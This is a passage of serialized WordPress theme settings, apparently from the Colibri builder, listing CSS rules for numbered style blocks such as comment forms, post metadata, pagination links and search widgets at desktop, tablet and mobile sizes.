border-bottom-color: #03a9f4;\n border-bottom-style: solid;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 5px;\n border-left-width: 2px;\n border-left-color: #03a9f4;\n border-left-style: solid;\n padding-top: 12px;\n padding-right: 24px;\n padding-bottom: 12px;\n padding-left: 24px;\n font-family: Open Sans;\n font-weight: 600;\n text-transform: uppercase;\n font-size: 12px;\n line-height: 1;\n letter-spacing: 1px;\n color: #FFFFFF;\n}\n#colibri .comment-respond input:not([type=\"submit\"]),#colibri .comment-respond textarea {\n border-top-width: 1px;\n border-top-color: rgb(238, 238, 238);\n border-top-style: solid;\n border-top-left-radius: 5px;\n border-top-right-radius: 5px;\n border-right-width: 1px;\n border-right-color: rgb(238, 238, 238);\n border-right-style: solid;\n border-bottom-width: 1px;\n border-bottom-color: rgb(238, 238, 238);\n border-bottom-style: solid;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 5px;\n border-left-width: 1px;\n border-left-color: rgb(238, 238, 238);\n border-left-style: solid;\n font-family: Open Sans;\n font-weight: 400;\n font-size: 16px;\n color: rgb(37, 41, 42);\n background-color: rgba(0,0,0,0);\n background-image: none;\n padding-top: 5px;\n padding-right: 5px;\n padding-bottom: 5px;\n padding-left: 5px;\n}\n#colibri .comment-respond label {\n color: rgb(37, 41, 42);\n border-top-width: 0px;\n border-top-style: none;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-left-width: 0px;\n border-left-style: none;\n}\n#colibri .comment-respond .comment-reply-title {\n font-family: Open Sans;\n font-weight: 600;\n font-size: 1.25em;\n color: #17252a;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:103;a:3:{s:7:\"desktop\";s:45:\"#colibri .style-103 {\n margin-top: -30px;\n}\n\";s:6:\"tablet\";s:45:\"#colibri .style-103 {\n margin-top: -15px;\n}\n\";s:6:\"mobile\";s:0:\"\";}i:104;a:3:{s:7:\"desktop\";s:104:\"#colibri .style-104 {\n height: auto;\n min-height: unset;\n padding-top: 0px;\n padding-bottom: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:105;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:106;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:107;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:108;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:109;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:110;a:3:{s:7:\"desktop\";s:542:\"#colibri .style-110 {\n text-align: center;\n height: auto;\n min-height: unset;\n background-color: #FFFFFF;\n background-image: none;\n box-shadow: 0px 10px 40px 0px rgba(1, 51, 74, 0.15) ;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 5px;\n border-top-right-radius: 5px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 5px;\n border-left-width: 0px;\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:111;a:3:{s:7:\"desktop\";s:269:\"#colibri .style-111 {\n background-color: rgba(255,255,255,0);\n background-image: none;\n text-align: center;\n margin-bottom: 0px;\n}\n#colibri .style-111 .colibri-post-thumbnail-shortcode img {\n height: 300px;\n object-position: center center;\n object-fit: cover;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:112;a:3:{s:7:\"desktop\";s:46:\"#colibri .style-112 {\n margin-bottom: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:113;a:3:{s:7:\"desktop\";s:543:\".style-113 > .h-y-container > *:not(:last-child) {\n margin-bottom: 10px;\n}\n#colibri .style-113 {\n text-align: left;\n height: auto;\n min-height: unset;\n border-top-width: 0px;\n border-top-color: rgb(238, 238, 238);\n border-top-style: solid;\n border-right-width: 0px;\n border-right-color: rgb(238, 238, 238);\n border-right-style: solid;\n border-bottom-width: 1px;\n border-bottom-color: rgb(238, 238, 238);\n border-bottom-style: solid;\n border-left-width: 0px;\n border-left-color: rgb(238, 238, 238);\n border-left-style: solid;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:46:\"#colibri .style-113 {\n text-align: center;\n}\n\";}i:114;a:3:{s:7:\"desktop\";s:524:\"#colibri .style-114 {\n margin-bottom: 0px;\n}\n#colibri .style-114 svg {\n width: 18px ;\n height: 18px;\n display: none;\n margin-right: 5px;\n}\n#colibri .style-114 .metadata-suffix {\n font-size: 14px;\n color: rgb(37, 41, 42);\n}\n#colibri .style-114 .metadata-prefix {\n font-size: 14px;\n color: rgb(37, 41, 42);\n}\n#colibri .style-114 a {\n text-decoration: none;\n font-size: 14px;\n color: rgb(70, 112, 127);\n}\n#colibri .style-114 a:hover {\n color: rgb(0, 0, 0);\n}\n#colibri .style-114 a:hover {\n color: rgb(0, 0, 0);\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:115;a:3:{s:7:\"desktop\";s:478:\"#colibri .style-115 svg {\n width: 18px ;\n height: 18px;\n display: none;\n margin-right: 5px;\n}\n#colibri .style-115 .metadata-suffix {\n font-size: 14px;\n color: rgb(37, 41, 42);\n}\n#colibri .style-115 .metadata-prefix {\n font-size: 14px;\n color: rgb(37, 41, 42);\n}\n#colibri .style-115 a {\n text-decoration: none;\n font-size: 14px;\n color: rgb(70, 112, 127);\n}\n#colibri .style-115 a:hover {\n color: rgb(0, 0, 0);\n}\n#colibri .style-115 a:hover {\n color: rgb(0, 0, 0);\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:116;a:3:{s:7:\"desktop\";s:198:\"#colibri .style-116 h1,#colibri .style-116 h2,#colibri .style-116 h3,#colibri .style-116 h4,#colibri .style-116 h5,#colibri .style-116 h6 {\n margin-bottom: 0px;\n transition-duration: 0.5s;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:117;a:3:{s:7:\"desktop\";s:72:\"#colibri .style-117 .colibri-post-excerpt {\n color: rgb(37, 41, 42);\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:118;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:119;a:3:{s:7:\"desktop\";s:157:\".style-119 > .h-y-container > *:not(:last-child) {\n margin-bottom: 10px;\n}\n#colibri .style-119 {\n text-align: left;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:120;a:3:{s:7:\"desktop\";s:293:\"#colibri .style-120 svg {\n width: 24px ;\n height: 24px;\n display: inline-block;\n margin-right: 5px;\n}\n#colibri .style-120 a {\n text-decoration: none;\n color: #03a9f4;\n}\n#colibri .style-120 a:hover {\n color: rgb(2, 110, 159);\n}\n#colibri .style-120 a:hover {\n color: rgb(2, 110, 159);\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:121;a:3:{s:7:\"desktop\";s:158:\".style-121 > .h-y-container > *:not(:last-child) {\n margin-bottom: 10px;\n}\n#colibri .style-121 {\n text-align: right;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:122;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:123;a:3:{s:7:\"desktop\";s:800:\"#colibri .style-123-icon {\n width: 16px;\n height: 16px;\n margin-right: 0px;\n margin-left: 5px;\n}\n#colibri .style-123 {\n text-align: center;\n font-family: Open Sans;\n font-weight: 400;\n font-size: 16px;\n line-height: 1.6;\n color: #03a9f4;\n border-top-width: 2px;\n border-top-style: none;\n border-top-left-radius: 5px;\n border-top-right-radius: 5px;\n border-right-width: 2px;\n border-right-style: none;\n border-bottom-width: 2px;\n border-bottom-style: none;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 5px;\n border-left-width: 2px;\n border-left-style: none;\n}\n#colibri .style-123:hover,#colibri .style-123:focus {\n color: rgb(2, 110, 159);\n}\n#colibri .style-123:active .style-123-icon {\n width: 16px;\n height: 16px;\n margin-right: 0px;\n margin-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:124;a:3:{s:7:\"desktop\";s:473:\"#colibri .style-124 {\n border-top-width: 1px;\n border-top-color: rgb(224, 224, 224);\n border-top-style: solid;\n border-right-width: 0px;\n border-right-color: rgb(224, 224, 224);\n border-right-style: solid;\n border-bottom-width: 0px;\n border-bottom-color: rgb(224, 224, 224);\n border-bottom-style: solid;\n border-left-width: 0px;\n border-left-color: rgb(224, 224, 224);\n border-left-style: solid;\n margin-top: 45px;\n margin-right: 30px;\n margin-left: 30px;\n}\n\";s:6:\"tablet\";s:67:\"#colibri .style-124 {\n margin-right: 10px;\n margin-left: 10px;\n}\n\";s:6:\"mobile\";s:67:\"#colibri .style-124 {\n margin-right: 10px;\n margin-left: 10px;\n}\n\";}i:125;a:3:{s:7:\"desktop\";s:106:\"#colibri .style-125 {\n text-align: center;\n height: auto;\n min-height: unset;\n padding-right: 15px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:126;a:3:{s:7:\"desktop\";s:885:\"#colibri .style-126 .nav-links .prev-navigation a,#colibri .style-126 .nav-links .next-navigation a {\n text-decoration: none;\n color: rgb(23, 37, 42);\n border-top-width: 2px;\n border-top-color: black;\n border-top-style: none;\n border-top-left-radius: 0px;\n border-top-right-radius: 0px;\n border-right-width: 2px;\n border-right-color: black;\n border-right-style: none;\n border-bottom-width: 2px;\n border-bottom-color: black;\n border-bottom-style: none;\n border-bottom-left-radius: 0px;\n border-bottom-right-radius: 0px;\n border-left-width: 2px;\n border-left-color: black;\n border-left-style: none;\n}\n#colibri .style-126 .nav-links .prev-navigation a:hover,#colibri .style-126 .nav-links .next-navigation a:hover {\n color: #03a9f4;\n}\n#colibri .style-126 .nav-links .prev-navigation a:hover,#colibri .style-126 .nav-links .next-navigation a:hover {\n color: #03a9f4;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:127;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-127 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:128;a:3:{s:7:\"desktop\";s:296:\"#colibri .style-128 .page-numbers {\n margin-right: 10px;\n color: rgb(23, 37, 42);\n}\n#colibri .style-128 .page-numbers:hover {\n color: #03a9f4;\n}\n#colibri .style-128 .page-numbers:hover {\n color: #03a9f4;\n}\n#colibri .style-128 .page-numbers.current {\n margin-right: 10px;\n color: #03a9f4;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:129;a:3:{s:7:\"desktop\";s:105:\"#colibri .style-129 {\n text-align: center;\n height: auto;\n min-height: unset;\n padding-left: 15px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:130;a:3:{s:7:\"desktop\";s:893:\"#colibri .style-130 .nav-links .prev-navigation a,#colibri .style-130 .nav-links .next-navigation a {\n text-decoration: none;\n color: rgb(23, 37, 42);\n border-top-width: 2px;\n border-top-color: #17252a;\n border-top-style: none;\n border-top-left-radius: 0px;\n border-top-right-radius: 0px;\n border-right-width: 2px;\n border-right-color: #17252a;\n border-right-style: none;\n border-bottom-width: 2px;\n border-bottom-color: #17252a;\n border-bottom-style: none;\n border-bottom-left-radius: 0px;\n border-bottom-right-radius: 0px;\n border-left-width: 2px;\n border-left-color: #17252a;\n border-left-style: none;\n}\n#colibri .style-130 .nav-links .prev-navigation a:hover,#colibri .style-130 .nav-links .next-navigation a:hover {\n color: #03a9f4;\n}\n#colibri .style-130 .nav-links .prev-navigation a:hover,#colibri .style-130 .nav-links .next-navigation a:hover {\n color: #03a9f4;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:131;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:132;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:133;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-133 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:134;a:3:{s:7:\"desktop\";s:363:\"#colibri .style-134 p,#colibri .style-134 h1,#colibri .style-134 h2,#colibri .style-134 h3,#colibri .style-134 h4,#colibri .style-134 h5,#colibri .style-134 h6 {\n font-size: 10em;\n color: rgb(23, 37, 42);\n}\n#colibri .style-134 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:135;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-135 ul {\n list-style-type: disc;\n}\n#colibri .style-135 ol {\n list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:136;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:137;a:3:{s:7:\"desktop\";s:1300:\"#colibri .style-137-icon {\n width: 16px;\n height: 16px;\n margin-right: 0px;\n margin-left: 10px;\n}\n#colibri .style-137 {\n background-color: rgba(3, 169, 244, 0);\n background-image: none;\n font-family: Open Sans;\n font-weight: 400;\n text-transform: none;\n font-size: 16px;\n line-height: 1.5em;\n letter-spacing: 1px;\n color: #03a9f4;\n border-top-width: 2px;\n border-top-color: #03a9f4;\n border-top-style: none;\n border-top-left-radius: 5px;\n border-top-right-radius: 5px;\n border-right-width: 2px;\n border-right-color: #03a9f4;\n border-right-style: none;\n border-bottom-width: 2px;\n border-bottom-color: #03a9f4;\n border-bottom-style: none;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 5px;\n border-left-width: 2px;\n border-left-color: #03a9f4;\n border-left-style: none;\n padding-top: 0px;\n padding-right: 0px;\n padding-bottom: 0px;\n padding-left: 0px;\n text-align: center;\n}\n#colibri .style-137:hover,#colibri .style-137:focus {\n background-color: rgba(2, 110, 159, 0);\n border-top-color: rgb(2, 110, 159);\n border-right-color: rgb(2, 110, 159);\n border-bottom-color: rgb(2, 110, 159);\n border-left-color: rgb(2, 110, 159);\n}\n#colibri .style-137:active .style-137-icon {\n width: 16px;\n height: 16px;\n margin-right: 0px;\n margin-left: 10px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:138;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:139;a:3:{s:7:\"desktop\";s:67:\"#colibri .style-139 {\n padding-top: 0px;\n padding-bottom: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:140;a:3:{s:7:\"desktop\";s:540:\"#colibri .style-140 {\n text-align: left;\n height: auto;\n min-height: unset;\n background-color: #FFFFFF;\n background-image: none;\n box-shadow: 0px 10px 40px 0px rgba(1, 51, 74, 0.15) ;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 5px;\n border-top-right-radius: 5px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 5px;\n border-left-width: 0px;\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:141;a:3:{s:7:\"desktop\";s:46:\"#colibri .style-141 {\n margin-bottom: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:142;a:3:{s:7:\"desktop\";s:81:\"#colibri .style-142 {\n text-align: left;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:143;a:3:{s:7:\"desktop\";s:433:\"#colibri .style-143 .categories-prefix {\n margin-right: 16px;\n}\n#colibri .style-143 a,#colibri .style-143 .colibri-post-category {\n margin-right: 10px;\n text-transform: lowercase;\n font-size: 14px;\n color: rgb(70, 112, 127);\n}\n#colibri .style-143 a:hover,#colibri .style-143 .colibri-post-category:hover {\n color: #17252a;\n}\n#colibri .style-143 a:hover,#colibri .style-143 .colibri-post-category:hover {\n color: #17252a;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:144;a:3:{s:7:\"desktop\";s:169:\"#colibri .style-144 h1,#colibri .style-144 h2,#colibri .style-144 h3,#colibri .style-144 h4,#colibri .style-144 h5,#colibri .style-144 h6 {\n margin-bottom: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:145;a:3:{s:7:\"desktop\";s:567:\"#colibri .style-145 .meta-separator {\n color: rgb(70, 112, 127);\n}\n#colibri .style-145 svg {\n width: 24px ;\n height: 24px;\n margin-right: 5px;\n display: none;\n}\n#colibri .style-145 .metadata-suffix {\n font-size: 14px;\n color: rgb(70, 112, 127);\n}\n#colibri .style-145 .metadata-prefix {\n font-size: 14px;\n color: rgb(37, 41, 42);\n}\n#colibri .style-145 a {\n text-decoration: none;\n text-transform: lowercase;\n font-size: 14px;\n color: rgb(70, 112, 127);\n}\n#colibri .style-145 a:hover {\n color: #17252a;\n}\n#colibri .style-145 a:hover {\n color: #17252a;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:146;a:3:{s:7:\"desktop\";s:72:\"#colibri .style-146 .colibri-post-excerpt {\n color: rgb(37, 41, 42);\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:147;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:148;a:3:{s:7:\"desktop\";s:562:\"#colibri .style-148-icon {\n width: 16px;\n height: 16px;\n margin-right: 0px;\n margin-left: 5px;\n}\n#colibri .style-148 {\n text-align: center;\n font-family: Open Sans;\n font-weight: 400;\n font-size: 16px;\n line-height: 1.6;\n color: #03a9f4;\n border-top-style: none;\n border-right-style: none;\n border-bottom-style: none;\n border-left-style: none;\n}\n#colibri .style-148:hover,#colibri .style-148:focus {\n color: rgb(2, 110, 159);\n}\n#colibri .style-148:active .style-148-icon {\n width: 16px;\n height: 16px;\n margin-right: 0px;\n margin-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:149;a:3:{s:7:\"desktop\";s:473:\"#colibri .style-149 {\n border-top-width: 1px;\n border-top-color: rgb(224, 224, 224);\n border-top-style: solid;\n border-right-width: 0px;\n border-right-color: rgb(224, 224, 224);\n border-right-style: solid;\n border-bottom-width: 0px;\n border-bottom-color: rgb(224, 224, 224);\n border-bottom-style: solid;\n border-left-width: 0px;\n border-left-color: rgb(224, 224, 224);\n border-left-style: solid;\n margin-top: 45px;\n margin-right: 30px;\n margin-left: 30px;\n}\n\";s:6:\"tablet\";s:67:\"#colibri .style-149 {\n margin-right: 15px;\n margin-left: 15px;\n}\n\";s:6:\"mobile\";s:67:\"#colibri .style-149 {\n margin-right: 10px;\n margin-left: 10px;\n}\n\";}i:150;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-150 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:151;a:3:{s:7:\"desktop\";s:106:\"#colibri .style-151 {\n text-align: center;\n height: auto;\n min-height: unset;\n padding-right: 15px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:152;a:3:{s:7:\"desktop\";s:889:\"#colibri .style-152 .nav-links .prev-navigation a,#colibri .style-152 .nav-links .next-navigation a {\n text-decoration: none;\n color: rgb(23, 37, 42);\n border-top-width: 2px;\n border-top-color: black;\n border-top-style: none;\n border-top-left-radius: 10px;\n border-top-right-radius: 10px;\n border-right-width: 2px;\n border-right-color: black;\n border-right-style: none;\n border-bottom-width: 2px;\n border-bottom-color: black;\n border-bottom-style: none;\n border-bottom-left-radius: 10px;\n border-bottom-right-radius: 10px;\n border-left-width: 2px;\n border-left-color: black;\n border-left-style: none;\n}\n#colibri .style-152 .nav-links .prev-navigation a:hover,#colibri .style-152 .nav-links .next-navigation a:hover {\n color: #03a9f4;\n}\n#colibri .style-152 .nav-links .prev-navigation a:hover,#colibri .style-152 .nav-links .next-navigation a:hover {\n color: #03a9f4;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:153;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-153 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:154;a:3:{s:7:\"desktop\";s:366:\"#colibri .style-154 .page-numbers {\n margin-right: 10px;\n font-size: 16px;\n line-height: 1.6;\n color: #17252a;\n}\n#colibri .style-154 .page-numbers:hover {\n color: #03a9f4;\n}\n#colibri .style-154 .page-numbers:hover {\n color: #03a9f4;\n}\n#colibri .style-154 .page-numbers.current {\n margin-right: 10px;\n font-size: 16px;\n line-height: 1.6;\n color: #03a9f4;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:155;a:3:{s:7:\"desktop\";s:105:\"#colibri .style-155 {\n text-align: center;\n height: auto;\n min-height: unset;\n padding-left: 15px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:156;a:3:{s:7:\"desktop\";s:889:\"#colibri .style-156 .nav-links .prev-navigation a,#colibri .style-156 .nav-links .next-navigation a {\n text-decoration: none;\n color: rgb(23, 37, 42);\n border-top-width: 2px;\n border-top-color: black;\n border-top-style: none;\n border-top-left-radius: 10px;\n border-top-right-radius: 10px;\n border-right-width: 2px;\n border-right-color: black;\n border-right-style: none;\n border-bottom-width: 2px;\n border-bottom-color: black;\n border-bottom-style: none;\n border-bottom-left-radius: 10px;\n border-bottom-right-radius: 10px;\n border-left-width: 2px;\n border-left-color: black;\n border-left-style: none;\n}\n#colibri .style-156 .nav-links .prev-navigation a:hover,#colibri .style-156 .nav-links .next-navigation a:hover {\n color: #03a9f4;\n}\n#colibri .style-156 .nav-links .prev-navigation a:hover,#colibri .style-156 .nav-links .next-navigation a:hover {\n color: #03a9f4;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:157;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:158;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-158 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:159;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:160;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:161;a:3:{s:7:\"desktop\";s:104:\"#colibri .style-161 {\n height: auto;\n min-height: unset;\n padding-top: 0px;\n padding-bottom: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:162;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:163;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:164;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:165;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:166;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:167;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-167 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:168;a:3:{s:7:\"desktop\";s:2355:\"#colibri .style-168 {\n border-top-width: 0px;\n border-top-style: none;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-left-width: 0px;\n border-left-style: none;\n}\n#colibri .style-168 .widget input:not([type=\"submit\"]) {\n font-family: Open Sans;\n font-weight: 400;\n font-size: 16px;\n color: rgb(37, 41, 42);\n border-top-width: 0px;\n border-top-color: black;\n border-top-style: none;\n border-right-width: 0px;\n border-right-color: black;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-color: black;\n border-bottom-style: none;\n border-left-width: 0px;\n border-left-color: black;\n border-left-style: none;\n}\n#colibri .style-168 .widget ul li a {\n font-family: Open Sans;\n font-weight: 400;\n text-decoration: none;\n font-size: 14px;\n color: rgb(102, 102, 102);\n}\n#colibri .style-168 .widget ul li a:hover {\n color: rgb(0, 0, 0);\n}\n#colibri .style-168 .widget ul li a:hover {\n color: rgb(0, 0, 0);\n}\n#colibri .style-168 .widget ul li,#colibri .style-168 .widget ol li,#colibri .style-168 .widget .textwidget p,#colibri .style-168 .widget .calendar_wrap td ,#colibri .style-168 .widget .calendar_wrap th ,#colibri .style-168 .widget .calendar_wrap caption {\n font-family: Open Sans;\n font-weight: 400;\n text-decoration: none;\n font-size: 14px;\n color: rgb(37, 41, 42);\n padding-top: 4px;\n padding-bottom: 4px;\n}\n#colibri .style-168 .widget ul,#colibri .style-168 .widget ol {\n list-style-type: none;\n}\n#colibri .style-168 .widget h1,#colibri .style-168 .widget h2,#colibri .style-168 .widget h3,#colibri .style-168 .widget h4,#colibri .style-168 .widget h5,#colibri .style-168 .widget h6 {\n font-family: Open Sans;\n font-weight: 600;\n font-size: 16px;\n line-height: 1.6;\n color: #17252a;\n border-top-width: 0px;\n border-top-style: none;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-left-width: 0px;\n border-left-style: none;\n margin-bottom: 10px;\n}\n#colibri .style-168 .widget {\n text-align: left;\n border-top-width: 0px;\n border-top-style: none;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-left-width: 0px;\n border-left-style: none;\n margin-bottom: 20px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:54:\"#colibri .style-168 .widget {\n text-align: center;\n}\n\";}i:169;a:3:{s:7:\"desktop\";s:3575:\"#colibri .style-168 .widget.widget_search button[type=\"submit\"] {\n display: inline-block;\n}\n#colibri .style-168 .widget.widget_search input[type=\"submit\"] {\n display: none;\n}\n#colibri .style-168 .widget.widget_search input[type=\"submit\"],#colibri .style-168 .widget.widget_search button[type=\"submit\"] {\n background-color: rgb(249, 250, 251);\n background-image: none;\n font-size: 16px;\n line-height: 1;\n color: #17252a;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 0px;\n border-top-right-radius: 5px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 0px;\n border-bottom-right-radius: 5px;\n border-left-width: 0px;\n border-left-style: none;\n width: auto;\n padding-top: 10px;\n padding-right: 12px;\n padding-bottom: 10px;\n padding-left: 12px;\n margin-top: 0px;\n margin-right: 0px;\n margin-bottom: 0px;\n margin-left: 0px;\n transition-duration: 0.5s;\n display: inline-block;\n}\n#colibri .style-168 .widget.widget_search input[type=\"submit\"]:hover,#colibri .style-168 .widget.widget_search button[type=\"submit\"]:hover {\n color: #03a9f4;\n}\n#colibri .style-168 .widget.widget_search input[type=\"submit\"]:hover,#colibri .style-168 .widget.widget_search button[type=\"submit\"]:hover {\n color: #03a9f4;\n}\n#colibri .style-168 .widget.widget_search input:not([type=\"submit\"])::placeholder {\n color: rgb(37, 41, 42);\n}\n#colibri .style-168 .widget.widget_search input:not([type=\"submit\"]) {\n padding-top: 10px;\n padding-right: 12px;\n padding-bottom: 10px;\n padding-left: 12px;\n font-size: 16px;\n color: rgb(37, 41, 42);\n background-color: rgb(249, 250, 251);\n background-image: none;\n border-top-width: 0px;\n border-top-color: rgb(222, 222, 222);\n border-top-style: none;\n border-top-left-radius: 5px;\n border-top-right-radius: 0px;\n border-right-width: 0px;\n border-right-color: rgb(222, 222, 222);\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-color: rgb(222, 222, 222);\n border-bottom-style: none;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 0px;\n border-left-width: 